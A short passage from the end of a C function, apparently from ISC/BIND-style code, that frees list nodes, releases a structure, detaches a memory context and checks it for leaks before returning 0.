release_node(&head);
}
while (tail) {
release_node(&tail);
}
isc_mem_putanddetach(&pq->mctx, pq, sizeof(*pq));
isc_mem_detach(&mctx);
isc_mem_checkdestroyed(stderr);
return (0);
}